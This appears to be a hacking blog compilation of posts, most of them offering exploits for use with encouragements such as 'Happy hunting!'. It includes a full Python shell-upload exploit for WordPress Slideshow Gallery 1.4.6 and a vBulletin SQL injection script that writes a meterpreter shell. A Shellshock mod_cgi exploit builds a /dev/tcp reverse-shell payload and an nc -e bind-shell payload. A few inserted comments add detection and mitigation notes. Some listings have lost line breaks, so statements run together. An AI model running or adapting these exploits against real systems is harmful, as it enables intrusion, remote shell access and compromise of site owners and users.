This is a video tutorial about uploading a PHP shell to a target using the php://input stream.
It is an old video, but the technique still works today.

The tools needed for this trick are Live HTTP Headers and Tamper Data from Mozilla Add-ons.
You can download the video here.

Thanks for downloading and watching.. :)


Here is my video tutorial about local file inclusion (LFI) using /proc/self/environ.
This is an old trick, but it still works.
For a better view, open the HTML file in your browser.
You can download it here
Tools: Mozilla Firefox & Tamper Data Plugin.
Thanks for watching.. :)


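WordPress Slideshow Gallery 1.4.6 suffers from a shell upload vulnerability.
The exploit was written by Claudio Viviani; its header credits the discovery to Jesus Ramirez Pichardo.
The bug is from last month, but I think there are still more targets because it's WordPress. :)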

Description
Feature content in beautiful and fast JavaScript powered slideshow gallery showcases on your WordPress website. You can easily display multiple galleries throughout your WordPress website displaying your custom added slides, slide galleries or showing slides from WordPress posts/pages. The slideshow is flexible, all aspects can easily be configured and embedding/hardcoding the slideshow gallery is a breeze.
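Here is the exploit and how to use it. The exploit is written in Python and, per its header, needs a valid WordPress login (the -u/-p options) with user slide management enabled; for site owners the relevant mitigations are updating the plugin past 1.4.6 and preventing PHP files from executing under wp-content/uploads.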
You can download it here
#!/usr/bin/env python## WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit## WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)## Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/## Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it### Disclaimer:## This exploit is intended for educational purposes only and the author# can not be held liable for any kind of damages done whatsoever to your machine,# or damages caused by some other,creative application of this exploit.# In any case you disagree with the above statement,stop here.### Requirements:## 1) Enabled user management slide# 2) python's httplib2 lib#    Installation: pip install httplib2## Usage:## python wp_gallery_slideshow_146_suv.py -t http[s]://localhost -u user -p pwd -f sh33l.php# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost/wordpress -u user -p pwd -f sh33l.php# python wp_gallery_slideshow_146_suv.py -t http[s]://localhost:80|443 -u user -p pwd -f sh33l.php## Backdoor Location:## http://localhost/wp-content/uploads/slideshow-gallery/sh33l.php## Tested on Wordpress 3.6, 3.7, 3.8, 3.9, 4.0#
# http connectionimport urllib, httplib2, sys, mimetypes# Args managementimport optparse# Error managementimport socket, httplib, sys# file managementimport os, os.path
def checkurl(url):
    """Return *url* unchanged when it begins with http:// or https://.

    Any other value prints an error message and terminates the script with
    exit status 1.
    """
    # Guard-clause form: accept the two supported schemes first.
    if url.startswith(("https://", "http://")):
        return url
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)
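def checkfile(file):
    """Return *file* if it is an existing regular file readable by this process.

    Prints an error and exits with status 1 otherwise.

    The original condition joined the two tests with ``and``, so a path that
    failed only one of them (a readable directory, or an existing file without
    read permission) was accepted and the script failed later at ``open()``.
    Either failure now rejects the path.
    """
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        # Single-argument parenthesised print behaves the same on Python 2 and 3.
        print('[X] '+file+' file is missing or not readable')
        sys.exit(1)
    return file


def get_content_type(filename):
    """Return the MIME type guessed from *filename*'s extension.

    Falls back to 'application/octet-stream' when ``mimetypes`` has no guess.
    """
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'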
# Create multipart headerdef create_body_sh3ll_upl04d(payloadname):
   getfields = dict()   getfields['Slide[id]'] = ''   getfields['Slide[order]'] = ''   getfields['Slide[title]'] = 'h0m3l4b1t'   getfields['Slide[description]'] = 'h0m3l4b1t'   getfields['Slide[showinfo]'] = 'both'   getfields['Slide[iopacity]'] = '70'   getfields['Slide[type]'] = 'file'   getfields['Slide[image_url]'] = ''   getfields['Slide[uselink]'] = 'N'   getfields['Slide[link]'] = ''   getfields['Slide[linktarget]'] = 'self'   getfields['Slide[title]'] = 'h0m3l4b1t'
   payloadcontent = open(payloadname).read()
   LIMIT = '----------lImIt_of_THE_fIle_eW_$'   CRLF = '\r\n'
   L = []   for (key, value) in getfields.items():      L.append('--' + LIMIT)      L.append('Content-Disposition: form-data; name="%s"' % key)      L.append('')      L.append(value)
   L.append('--' + LIMIT)   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('image_file', payloadname))   L.append('Content-Type: %s' % get_content_type(payloadname))   L.append('')   L.append(payloadcontent)   L.append('--' + LIMIT + '--')   L.append('')   body = CRLF.join(L)   return body
banner = """
 $$$$$$\  $$\ $$\       $$\                     $$\$$  __$$\ $$ |\__|      $$ |                    $$ |$$ /  \__|$$ |$$\  $$$$$$$ | $$$$$$\   $$$$$$$\ $$$$$$$\   $$$$$$\  $$\  $$\  $$\\$$$$$$\  $$ |$$ |$$  __$$ |$$  __$$\ $$  _____|$$  __$$\ $$  __$$\ $$ | $$ | $$ | \____$$\ $$ |$$ |$$ /  $$ |$$$$$$$$ |\$$$$$$\  $$ |  $$ |$$ /  $$ |$$ | $$ | $$ |$$\   $$ |$$ |$$ |$$ |  $$ |$$   ____| \____$$\ $$ |  $$ |$$ |  $$ |$$ | $$ | $$ |\$$$$$$  |$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$$$$$$  |$$ |  $$ |\$$$$$$  |\$$$$$\$$$$  | \______/ \__|\__| \_______| \_______|\_______/ \__|  \__| \______/  \_____\____/


             $$$$$$\            $$\ $$\                                       $$\ $$\   $$\     $$$$$$\            $$  __$$\           $$ |$$ |                                    $$$$ |$$ |  $$ |   $$  __$$\            $$ /  \__| $$$$$$\  $$ |$$ | $$$$$$\   $$$$$$\  $$\   $$\       \_$$ |$$ |  $$ |   $$ /  \__|            $$ |$$$$\  \____$$\ $$ |$$ |$$  __$$\ $$  __$$\ $$ |  $$ |        $$ |$$$$$$$$ |   $$$$$$$\            $$ |\_$$ | $$$$$$$ |$$ |$$ |$$$$$$$$ |$$ |  \__|$$ |  $$ |        $$ |\_____$$ |   $$  __$$\            $$ |  $$ |$$  __$$ |$$ |$$ |$$   ____|$$ |      $$ |  $$ |        $$ |      $$ |   $$ /  $$ |            \$$$$$$  |\$$$$$$$ |$$ |$$ |\$$$$$$$\ $$ |      \$$$$$$$ |      $$$$$$\ $$\ $$ |$$\ $$$$$$  |             \______/  \_______|\__|\__| \_______|\__|       \____$$ |      \______|\__|\__|\__|\______/                                                            $$\   $$ |                                                            \$$$$$$  |                                                             \______/
                                                                   W0rdpr3ss Sl1d3sh04w G4ll3ry 1.4.6 Sh3ll Upl04d Vuln.
                          =============================================                          - Release date: 2014-08-28                          - Discovered by: Jesus Ramirez Pichardo                          - CVE: 2014-5460                          =============================================
                                          Written by:
                                        Claudio Viviani
                                     http://www.homelab.it
                                        info@homelab.it                                     homelabit@protonmail.ch
                                https://www.facebook.com/homelabit                                https://twitter.com/homelabit                                https://plus.google.com/+HomelabIt1/                      https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww"""
commandList = optparse.OptionParser('usage: %prog -t URL -u USER -p PASSWORD -f FILENAME.PHP [--timeout sec]')commandList.add_option('-t', '--target', action="store",                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",                  )commandList.add_option('-f', '--file', action="store",                  help="Insert file name, ex: shell.php",                  )commandList.add_option('-u', '--user', action="store",                  help="Insert Username",                  )commandList.add_option('-p', '--password', action="store",                  help="Insert Password",                  )commandList.add_option('--timeout', action="store", default=10, type="int",                  help="[Timeout Value] - Default 10",                  )
options, remainder = commandList.parse_args()
# Check argsif not options.target or not options.user or not options.password or not options.file:    print(banner)    commandList.print_help()    sys.exit(1)
payloadname = checkfile(options.file)host = checkurl(options.target)username = options.userpwd = options.passwordtimeout = options.timeout
print(banner)
# NOTE(review): line breaks were lost in this copy of the listing; the first line below holds two
# assignments fused together.
# The two paths built here are the request footprint of the script: a POST to /wp-login.php and a
# POST to /wp-admin/admin.php with page=slideshow-slides&method=save. For log review, that pair
# followed by a request for a .php file under /wp-content/uploads/slideshow-gallery/ (the location
# named in the script's header comment) is the pattern to look for.
url_login_wp = host+'/wp-login.php'url_admin_slideshow = host+'/wp-admin/admin.php?page=slideshow-slides&method=save'
# Fixed multipart boundary string; it is sent in the content-type header of the upload request.
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
# NOTE(review): certificate validation is switched off, so over https the client accepts any
# certificate and the username/password posted to wp-login.php are not protected against
# interception on the network path.
http = httplib2.Http(disable_ssl_certificate_validation=True, timeout=timeout)
# Wordpress login POST Databody = { 'log':username,         'pwd':pwd,         'wp-submit':'Login',         'testcookie':'1' }# Wordpress login headers with Cookieheaders = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',            'Content-type': 'application/x-www-form-urlencoded',            'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }try:    response, content = http.request(url_login_wp, 'POST', headers=headers, body=urllib.urlencode(body))    if len(response['set-cookie'].split(" ")) < 4:    #if 'httponly' in response['set-cookie'].split(" ")[-1]:        print '[X] Wrong username or password'        sys.exit()    else:        print '[+] Username & password ACCEPTED!\n'
        # Create cookie for admin panel        if 'secure' in response['set-cookie']:            c00k13 = response['set-cookie'].split(" ")[6]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[10]        else:            c00k13 = response['set-cookie'].split(" ")[5]+' '+response['set-cookie'].split(" ")[0]+' '+response['set-cookie'].split(" ")[8]
        bodyupload = create_body_sh3ll_upl04d(payloadname)
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',                   'Cookie': c00k13,                   'content-type': content_type,                   'content-length': str(len(bodyupload)) }        response, content = http.request(url_admin_slideshow, 'POST', headers=headers, body=bodyupload)
        if 'admin.php?page=slideshow-slides&Galleryupdated=true&Gallerymessage=Slide+has+been+saved' in content:            print '[!] Shell Uploaded!'            print '[+] Check url: '+host+'/wp-content/uploads/slideshow-gallery/'+payloadname.lower()+' (lowercase!!!!)'        else:            print '[X] The user can not upload files or plugin fixed :((('
except socket.timeout:    print('[X] Connection Timeout')    sys.exit(1)except socket.error:    print('[X] Connection Refused')    sys.exit(1)except httplib.ResponseNotReady:    print('[X] Server Not Responding')    sys.exit(1)except httplib2.ServerNotFoundError:    print('[X] Server Not Found')    sys.exit(1)except httplib2.HttpLib2Error:    print('[X] Connection Error!!')    sys.exit(1)


In this tutorial, I will show you how to use AOL Desktop Software (version 9.1) as a Virtual Private Network (VPN).

First download AOL Desktop 9.1. Search on Google to download.

Register new email on mail.aol.com

After download, install AOL Desktop 9.1.

Let me check my IP address first. I have Indonesian IP address.












Open AOL 9.1 and click Connect Options













Then click Advanced Broadband Settings


















Click Continue










The AOL Setup window will pop up; choose the Broadband tab and click Add a Broadband Profile















Fill the Profile Name for example aolvpn or whatever you like and click Add















On Connection Type choose Home Network and click Save















If AOL Desktop asks for a username and password, enter the ones that you created before.
On Connection choose Profile Name that you created. In this case my Profile Name is aolvpn.













Logging in to AOL...













Successfully connected to AOL












Check my IP address again.. It's changed now! yeey..












Well, that's all.. :)
Let me know if you guys have any trouble with this.. Safe browsing, folks!


  1. vBulletin (vB) is a proprietary Internet forum software package developed by vBulletin Solutions, Inc., a division of Internet Brands. It is written in PHP and uses a MySQL database server.
  2. This vulnerability was found by oststrom. Here is the exploit code.
  3. #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    '''
    @author: tintinweb 0x721427D8
    '''
    import urllib2, cookielib, urllib, json, hashlib class Exploit(object):

    baseurl = None
    cookies = None

    def __init__(self,baseurl,params, debuglevel=1):
    self.cookies = cookielib.LWPCookieJar()
    handlers = [
    urllib2.HTTPHandler(debuglevel=debuglevel),
    urllib2.HTTPSHandler(debuglevel=debuglevel),
    urllib2.HTTPCookieProcessor(self.cookies)
    ]
    self.browser = urllib2.build_opener(*handlers)
    self.baseurl=baseurl
    self.params = params

    def call(self,path="",data={}):
    assert(isinstance(data,dict))
    data = urllib.urlencode(data) req = urllib2.Request("%s%s"%(self.baseurl,path),data)
    req.add_header("Content-Type", "application/x-www-form-urlencoded") return self.browser.open(req)

    def call_json(self,path=None,data={}):
    try:
    x=self.call(path,data).read()
    print "raw_response", x
    resp = json.loads(x)
    except urllib2.HTTPError, he:
    resp = he.read()
    return resp def vb_init_api(self):
    params = {'api_m':'api_init'}
    params.update(self.params)
    data = self.call_json("?%s"%(urllib.urlencode(params)))
    self.session = data
    return data

    def vb_call(self, params):
    api_sig = self._vb_build_api_sig(params)
    req_params = self._vb_build_regstring(api_sig)
    params.update(req_params)
    data = self.call_json("?%s"%(urllib.urlencode(params)),data=params)
    if not isinstance(data, dict):
    return data
    if 'errormessage' in data['response'].keys():
    raise Exception(data)
    return data def _ksort(self, d):
    ret = []
    for key, value in [(k,d[k]) for k in sorted(d.keys())]:
    ret.append( "%s=%s"%(key,value))
    return "&".join(ret) def _ksort_urlencode(self, d):
    ret = []
    for key, value in [(k,d[k]) for k in sorted(d.keys())]:
    ret.append( urllib.urlencode({key:value}))
    return "&".join(ret) def _vb_build_api_sig(self, params):
    apikey = self.params['apikey']
    login_string = self._ksort_urlencode(params)
    access_token = str(self.session['apiaccesstoken'])
    client_id = str(self.session['apiclientid'])
    secret = str(self.session['secret'])
    return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest()

    def _vb_build_regstring(self, api_sig):
    params = {
    'api_c':self.session['apiclientid'],
    'api_s':self.session['apiaccesstoken'],
    'api_sig':api_sig,
    'api_v':self.session['apiversion'],
    }
    return params
    if __name__=="__main__":
    TARGET = "http://192.168.220.131/vbb4/api.php"
    APIKEY = "4FAVcRDc"
    REMOTE_SHELL_PATH = "/var/www/myShell.php"
    TRIGGER_URL = "http://192.168.220.131/myShell.php"
    DEBUGLEVEL = 0 # 1 to enable request tracking
    ### 2. sqli - simple - write outfile
    print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php"
    params = {'clientname':'fancy_exploit_client',
    'clientversion':'1.0',
    'platformname':'exploit',
    'platformversion':'1.5',
    'uniqueid':'1234',
    'apikey':APIKEY}
    x = Exploit(baseurl=TARGET,params=params)

    vars = x.vb_init_api()
    print vars
    '''
    x.vb_call(params={'api_m':'breadcrumbs_create',
    'type':'t',
    #'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH,
    'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH)
    })

    print "[ *] SUCCESS! - created file %s"%TRIGGER_URL
    '''
    ### 3. sqli - put meterpreter shell and trigger it
    print "[ 3 ] - sqli - meterpreter shell + trigger"
    with open("./meterpreter_bind_tcp") as f:
    shell = f.read() shell = shell.replace("","") #cleanup tags
    shell = shell.encode("base64").replace("\n","") #encode payload
    shell = ""%shell # add decoderstub
    shell = "0x"+shell.encode("hex") # for mysql outfile


    x.vb_call(params={'api_m':'breadcrumbs_create',
    'type':'t',
    'conceptid':"1 union select %s into OUTFILE '%s'"%(shell,REMOTE_SHELL_PATH)})
    print "[ *] SUCCESS! - triggering shell .. (script should not exit)"
    print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST= E"
    print "[ *] shell active ... waiting for it to die ..."
    print urllib2.urlopen(TRIGGER_URL)
    print "[ ] shell died!"
    print "-- quit --"


What is PayPal?
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet.

Well, a group of researchers called Vulnerability-Lab found a vulnerability in the PayPal iOS mobile app.

What do you think when you hear PayPal bug? Yeah man! Money! :)

Check out the vulnerability here. Happy hunting!


Apache's mod_cgi is affected by a remote exploit (Shellshock).
The exploit below is credited to Federico Galatolo and is written in Python.
Here is the code. Happy hunting!

#! /usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sys
stop = False
proxyhost = ""
proxyport = 0
def usage():
print """
Shellshock apache mod_cgi remote exploit
Usage:
./exploit.py var=
Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages:  specific cgi vulnerable pages (separated by comma)
proxy: host:port proxy
Payloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)
Example:
./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234
Credits:
Federico Galatolo 2014
"""
sys.exit(0)
# Sends one GET request per path in `pages`, carrying `payload` in both the Cookie and the
# Referer header. Requests go through the proxy when the module-level `proxyhost` is set and
# directly to `rhost` otherwise; the loop returns early once the module-level `stop` flag is set.
# lhost, lport and rport are accepted but not read inside this function.
# NOTE(review): indentation was lost in this copy of the listing, so the nesting of the 404 check
# and the sleep cannot be confirmed from here.
# Detection: both payload strings built by the caller begin with "() {", so web-server log review
# or IDS rules that flag Cookie/Referer values starting with that sequence on CGI paths cover
# these requests. The underlying fix is a bash build that no longer runs commands trailing a
# function definition passed in an environment variable.
def exploit(lhost,lport,rhost,rport,payload,pages):
headers = {"Cookie": payload, "Referer": payload}
for page in pages:
if stop:
return
print "[-] Trying exploit on : "+page
if proxyhost != "":
c = httplib.HTTPConnection(proxyhost,proxyport)
c.request("GET","http://"+rhost+page,headers=headers)
res = c.getresponse()
else:
c = httplib.HTTPConnection(rhost)
c.request("GET",page,headers=headers)
res = c.getresponse()
if res.status == 404:
print "[*] 404 on : "+page
time.sleep(1)

args = {}
for arg in sys.argv[1:]:
ar = arg.split("=")
args[ar[0]] = ar[1]
try:
args['payload']
except:
usage()
if args['payload'] == 'reverse':
try:
lhost = args['lhost']
lport = int(args['lport'])
rhost = args['rhost']
payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
except:
usage()
elif args['payload'] == 'bind':
try:
rhost = args['rhost']
rport = args['rport']
payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
except:
usage()
else:
print "[*] Unsupported payload"
usage()
try:
pages = args['pages'].split(",")
except:
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]
try:
proxyhost,proxyport = args['proxy'].split(":")
except:
pass
if args['payload'] == 'reverse':
serversocket = socket(AF_INET, SOCK_STREAM)
buff = 1024
addr = (lhost, lport)
serversocket.bind(addr)
serversocket.listen(10)
print "[!] Started reverse shell handler"
thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
serversocket = socket(AF_INET, SOCK_STREAM)
addr = (rhost,int(rport))
thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
buff = 1024
while True:
if args['payload'] == 'reverse':
clientsocket, clientaddr = serversocket.accept()
print "[!] Successfully exploited"
print "[!] Incoming connection from "+clientaddr[0]
stop = True
clientsocket.settimeout(3)
while True:
reply = raw_input(clientaddr[0]+"> ")
clientsocket.sendall(reply+"\n")
try:
data = clientsocket.recv(buff)
print data
except:
pass
if args['payload'] == 'bind':
try:
serversocket = socket(AF_INET, SOCK_STREAM)
time.sleep(1)
serversocket.connect(addr)
print "[!] Successfully exploited"
print "[!] Connected to "+rhost
stop = True
serversocket.settimeout(3)
while True:
reply = raw_input(rhost+"> ")
serversocket.sendall(reply+"\n")
data = serversocket.recv(buff)
print data
except:
pass